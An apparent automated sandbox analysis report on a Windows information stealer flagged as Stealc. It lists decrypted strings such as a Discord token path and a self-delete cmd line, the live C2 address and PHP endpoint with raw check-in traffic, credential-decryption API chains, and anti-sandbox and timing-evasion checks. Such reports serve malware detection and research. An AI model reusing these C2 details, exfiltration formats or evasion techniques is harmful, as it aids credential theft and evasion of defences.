                Source: 0.2.file.exe.810000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.810000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.810000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.810000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.810000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.810000.0.unpackString decryptor: https
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.810000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.810000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.810000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.810000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.810000.0.unpackString decryptor: build
                Source: 0.2.file.exe.810000.0.unpackString decryptor: token
                Source: 0.2.file.exe.810000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.810000.0.unpackString decryptor: file
                Source: 0.2.file.exe.810000.0.unpackString decryptor: message
                Source: 0.2.file.exe.810000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.810000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00829030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008172A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0081A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0081A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0081C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0081E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00811710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0081DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00823B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00823B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00824B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00824B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0081EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0081BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 33 33 41 32 46 46 45 38 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"F133A2FFE8A42936050476------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"tale------GHDAAKJEGCFCAKEBKJJE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_008162D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 33 33 41 32 46 46 45 38 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"F133A2FFE8A42936050476------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"tale------GHDAAKJEGCFCAKEBKJJE--
                Source: file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2092013993.000000000163D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2092013993.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpA%%
                Source: file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpm%A
                Source: file.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008500980_2_00850098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086B1980_2_0086B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C171530_2_00C17153
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008421380_2_00842138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C742CC0_2_00C742CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008542880_2_00854288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6A2F50_2_00C6A2F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E2580_2_0087E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088D39E0_2_0088D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089B3080_2_0089B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008545A80_2_008545A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087D5A80_2_0087D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083E5440_2_0083E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008345730_2_00834573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDC6920_2_00BDC692
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEC68B0_2_00CEC68B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008566C80_2_008566C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008996FD0_2_008996FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088A6480_2_0088A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008867990_2_00886799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C687FA0_2_00C687FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C727B00_2_00C727B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6D7BE0_2_00C6D7BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086D7200_2_0086D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086B8A80_2_0086B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008698B80_2_008698B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087F8D60_2_0087F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE28540_2_00CE2854
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008648680_2_00864868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDEA810_2_00BDEA81
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB0A5B0_2_00BB0A5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00880B880_2_00880B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884BA80_2_00884BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00878BD90_2_00878BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C70CD40_2_00C70CD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088AC280_2_0088AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B59C1C0_2_00B59C1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00865DB90_2_00865DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00864DC80_2_00864DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087AD380_2_0087AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086BD680_2_0086BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6BD310_2_00C6BD31
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00841D780_2_00841D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00881EE80_2_00881EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBFE340_2_00BBFE34
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C75E080_2_00C75E08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00858E780_2_00858E78
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00814610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: eysgbrhc ZLIB complexity 0.9946271392490953
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00829790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00823970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00823970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\UNET20J1.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2136064 > 1048576
                Source: file.exeStatic PE information: Raw size of eysgbrhc is bigger than: 0x100000 < 0x19e800
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.810000.0.unpack :EW;.rsrc :W;.idata :W; :EW;eysgbrhc:EW;qcadwkiz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;eysgbrhc:EW;qcadwkiz:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00829BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x213ba5 should be: 0x2139b7
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: eysgbrhc
                Source: file.exeStatic PE information: section name: qcadwkiz
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D490D6 push ecx; mov dword ptr [esp], eax0_2_00D49108
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF00DA push 7F47E222h; mov dword ptr [esp], ebp0_2_00CF0124
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF00DA push ebx; mov dword ptr [esp], 3FFFAAF0h0_2_00CF0165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD0099 push edx; mov dword ptr [esp], edi0_2_00CD00CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083A0DC push eax; retf 0_2_0083A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D09059 push edi; mov dword ptr [esp], 7FE58ABFh0_2_00D09077
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD01CE push ecx; mov dword ptr [esp], edi0_2_00CD0200
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D131F6 push ecx; mov dword ptr [esp], 50082635h0_2_00D13255
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D131F6 push 2A801711h; mov dword ptr [esp], edi0_2_00D132F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF91E4 push edi; mov dword ptr [esp], 550EB652h0_2_00CF924D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF91E4 push edx; mov dword ptr [esp], edi0_2_00CF9275
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF91E4 push ecx; mov dword ptr [esp], edi0_2_00CF9295
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D891E9 push esi; mov dword ptr [esp], ebx0_2_00D8924E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFF1F5 push ebp; mov dword ptr [esp], edi0_2_00CFF24C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFF1F5 push ebp; mov dword ptr [esp], edi0_2_00CFF265
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFF1F5 push 00F0F75Bh; mov dword ptr [esp], esi0_2_00CFF2AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D51194 push ebx; mov dword ptr [esp], esp0_2_00D51A5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF11AC push 5EA1480Dh; mov dword ptr [esp], eax0_2_00CF11DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083A109 push eax; retf 0_2_0083A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17153 push 3C176B1Fh; mov dword ptr [esp], edi0_2_00C1716E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17153 push edx; mov dword ptr [esp], ecx0_2_00C17172
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17153 push 252DD2F1h; mov dword ptr [esp], edx0_2_00C171F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17153 push ecx; mov dword ptr [esp], edi0_2_00C17292
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17153 push edx; mov dword ptr [esp], 5E0B6C4Dh0_2_00C17313
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7A103 push 3E170CD5h; mov dword ptr [esp], ebx0_2_00C7A128
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C742CC push 773CBDB9h; mov dword ptr [esp], edi0_2_00C7440F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C742CC push ebx; mov dword ptr [esp], 7FEBB069h0_2_00C74414
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C742CC push ebx; mov dword ptr [esp], 2B91EDC1h0_2_00C74556
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C742CC push 2DE14D73h; mov dword ptr [esp], edx0_2_00C74565
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C742CC push 598D402Ch; mov dword ptr [esp], edi0_2_00C74617
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C742CC push ecx; mov dword ptr [esp], ebp0_2_00C7475F
                Source: file.exeStatic PE information: section name: eysgbrhc entropy: 7.952388640493053

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00829BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00829BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37693
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C66850 second address: C66856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79B62 second address: C79B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79B66 second address: C79B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79CEC second address: C79D09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6074F511FDh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79D09 second address: C79D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79EA7 second address: C79EB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6074F511FAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79EB7 second address: C79EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79EBF second address: C79EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79EC3 second address: C79ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB70 second address: C7CB7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e rdtsc
